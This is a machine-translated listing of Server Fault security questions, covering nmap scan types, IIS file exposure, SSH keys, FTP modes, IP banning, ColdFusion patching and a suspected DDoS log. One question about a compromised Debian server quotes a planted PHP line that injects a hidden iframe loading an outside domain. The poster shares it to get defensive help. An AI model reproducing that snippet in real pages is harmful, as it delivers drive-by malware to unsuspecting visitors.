标签: security

Nmap:“nmap <target>”和“nmap -sS <target>”有什么区别?

这是一个非常基本的问题,但也是一个我似乎无法真正找到答案的问题,尽管查看了 nmap 文档(man、online 和 google)。

我的问题是,例如,执行nmap <target>和之间有什么区别nmap -sS <target>?我知道这-sS是 TCP SYN 扫描,但我想我不确定的是这与仅使用nmap <target>?

networking security linux unix ubuntu

1
推荐指数
2
解决办法
988
查看次数

在禁用目录浏览的情况下匿名托管在 IIS 上的文件有多安全?

为了详细说明这一点,我想知道使用以下配置托管在 IIS 网站上的文档的安全性:

  1. 禁用IIS 目录列表
  2. 匿名访问已启用
  3. 网站通过HTTPs访问
  4. 文件有很长的随机生成的名称(类似于 guid 加其他字符)

我相信这是一个相对安全的设置(我理解它不像真正经过身份验证的访问那么安全。)我想知道我是否看到了这堵大墙,但它很容易被比我更了解的人绕过。

我想我正在寻找的是一种可以绕过我上面概述的设置的方法。

security windows iis hacking

1
推荐指数
1
解决办法
1443
查看次数

最安全的网络服务器软件

我正在阅读有关Hiawatha 的文章,我想知道是否真的可以认为 Freebsd+Hiawatha 比 Linux+Lighttpd 或任何其他网络服务器更安全。

此外,如果您必须托管一个非常敏感的网站,您会使用哪个软件平台?

security freebsd web-server

1
推荐指数
1
解决办法
1433
查看次数

构建不可追踪的网络服务器

我有一个朋友托管了一些数据,可以使用两种方法从服务器下载:

  1. 使用他们首先必须下载到移动设备上的应用程序
  2. 直接访问网站

但是,对于数据有两个重要的考虑因素:它非常敏感,因为他不希望任何“中间人”能够告诉谁获得了数据或数据来自何处(来自服务器/ISP 日志等。 .) 当世界各地的访问者带宽极其有限时,它也应该可以访问。数据应该可以公开访问,并且易于被知道其存在的人获取。

这里的最终目标是保护访问者,让中间人无法知道访问者请求了什么内容,或者他/她从哪里请求它。基本上,正如标题所说,我们想要一个无法追踪的网络服务器。

为了帮助从中间人的日志中隐藏网站的身份,并帮助保护请求数据的个人,我认为一种解决方案是构建几个地理上分散的代理服务器,这些代理服务器与诸如No-IP.com。我认为以某种方式加密从 A 点到 B 点的数据(超越简单 SSL 的东西)也很好。

撇开编码考虑不谈,我想知道你们将如何在项目的服务器和网络端实现这种类型的安全性。

我使用像 no-ip.com 这样的服务,在全球范围内有许多不同的代理服务器的想法有意义吗?

PS:我意识到这篇文章中的一些内容含糊不清。不幸的是,我无法具体说明数据是什么,或者我们为什么需要这样一个安全的基础设施——与我们需要它的原因完全相同。如果您有任何疑虑或问题,请随时直接与我联系。

security

1
推荐指数
1
解决办法
265
查看次数

Mac 和 Linux 之间的安全无密码 ssh

好的,所以我 ssh 很多,主要是从我的 Mac 到我的 Linux 机器,但有时也从 Linux 机器到 mac 或从 Mac 到 Mac。我想实现一种安全的无密码方式在这些计算机之间进行 ssh,这样我就不必每天输入 50 次 ssh 密码。我知道可以通过创建一组没有密码短语的 SSH 密钥来完成,但我知道这不是一种安全或可靠的方法。

security linux ssh mac-osx

1
推荐指数
1
解决办法
195
查看次数

使用主动 FTP 模式代替被动模式的风险

在服务器上,我使用 Perl 脚本,该脚本计划使用 FTP 从另一台服务器定期下载一些文件。不幸的是,Perl FTP 模块中存在一些问题,导致脚本不时失败并意外终止。我发现这个问题可以通过从被动模式切换到主动模式来轻松解决。

如果我正确理解了这两种 FTP 模式之间的区别,那么使用主动模式将意味着我需要在防火墙内打开某个端口范围。我认为这会带来一些安全风险。所以我的问题是是否有一些解决方法或好的做法,以便我可以在我的服务器上以不会导致任何额外风险的方式使用活动模式。

security linux firewall ftp

1
推荐指数
1
解决办法
3060
查看次数

如何禁止来自端口 80 的潜在黑客 IP 地址?

我在网络服务器上托管了一堆 PHP 网站。虽然我已采取所有预防措施来保护所有端口,但特定于端口 80 的攻击仍在继续。我想禁止任何对任何网页产生积极兴趣的 IP 地址,例如在一小时内超过 200 个,或在一分钟内超过 15 个。我假设人类用户不能在一分钟内浏览 15 个页面,除非他有确实值得怀疑的原因。

理想情况下,我希望将 IP 地址登录到被禁止的数据库中,并且对于属于我的客户的那些 IP 地址也有一个白名单 IP 地址。

是否有任何现成的工具可以完成所有这些工作。我看到了fail2ban,它没有达到目的......

security hacking blocking ip-blocking port-80

1
推荐指数
1
解决办法
926
查看次数

应将哪些修补程序应用于 ColdFusion 8 服务器

我最近继承了一台运行 ColdFusion 8 的服务器,并且相信它可能已经有一段时间没有针对安全更新进行修补(根据http://www.adobe.com/support/security/#coldfusion)。

Coldfusion 安装是 8.0.1 (8,0,1,195765),但是我没有看到任何其他信息来查看从 Adob​​e 安全页面上显示的 13 中安装了哪些补丁。

有没有办法告诉我安装了哪些补丁?如果没有,我能告诉我们 8.0.1 中包含了哪些,所以我不必包含这些吗?

此外,看起来有些更新包含其他较旧的更新 - 我可以只安装最新的更新(列出来修复 APSB11-14)还是我还需要其他一些更新?

security coldfusion

1
推荐指数
1
解决办法
253
查看次数

如何监视文件/目录更改

我有一台运行 Debian Lenny 的服务器。最近我遇到了一些安全问题。我特别看到在 /etc/php5/conf.d 中创建了一个名为“php-dev.ini”的文件。乍一看,该文件看起来正常且无害,直到您打开它。它包含:

<?php print "<iframe src='http://google-traf.zyns.com/index.php?tp=4abd7c0637c89d7a' width='1' height='1' frameborder='0'></iframe>"; ?>
Run Code Online (Sandbox Code Playgroud)

显然我知道服务器有安全问题,所以请不要说“你给服务器打补丁了吗?” 回应。那已经完成了。已检查服务器是否存在 rootkit,并且没有可疑帐户。我对什么用户或 PID 正在写入此目录特别感兴趣,并且正在寻找可以使用哪些工具来帮助我。我已经研究过“iwatch”和“inotify”,但想在我走上研究之路之前从其他人那里得到一些反馈。有谁知道一个可以帮助我识别的好工具:

  1. 什么用户正在写入此目录
  2. 什么 PID 用于写入文件
  3. 哪个应用程序正在写入此目录

基本上,我希望做一些取证并了解监视文件系统。任何见解将不胜感激。

(编辑以引用 PHP 代码示例,因为它之前未显示。)

security linux debian

1
推荐指数
1
解决办法
2393
查看次数

我的网站不断受到 iPhone 的攻击……我被 DDOS 攻击了吗?

66.65.71.240 - - [05/Aug/2011:21:56:09 -0700] "GET /api/account_verify?accesstoken=k198nrtc7flswo6qhimuv5pd0 HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 (iPhone; iPhone OS 4.3; en_US)" "at:-" "dt:-" secure
220.128.111.225 - - [05/Aug/2011:21:56:11 -0700] "GET /api/account_verify?accesstoken=dv8asg0lwh2m1iu95bo3y6cjt HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 (iPhone; iPhone OS 4.3.3; en_SG)" "at:-" "dt:-" secure
124.171.7.154 - - [05/Aug/2011:21:56:13 -0700] "GET /api/account_verify?accesstoken=apu4q0sxtejni76z58ykwdrgl HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 (iPhone; iPhone OS 4.3.4; en_AU)" "at:-" "dt:-" secure
216.220.110.238 - - [05/Aug/2011:21:56:13 -0700] "GET /api/account_verify?accesstoken=9m6aqr4h2x0sp7fblw1ycveo5 HTTP/1.1" 500 2334 "-" "Geolo 1.0 rv:18 …
Run Code Online (Sandbox Code Playgroud)

security linux web-server ddos apache-2.2

1
推荐指数
1
解决办法
189
查看次数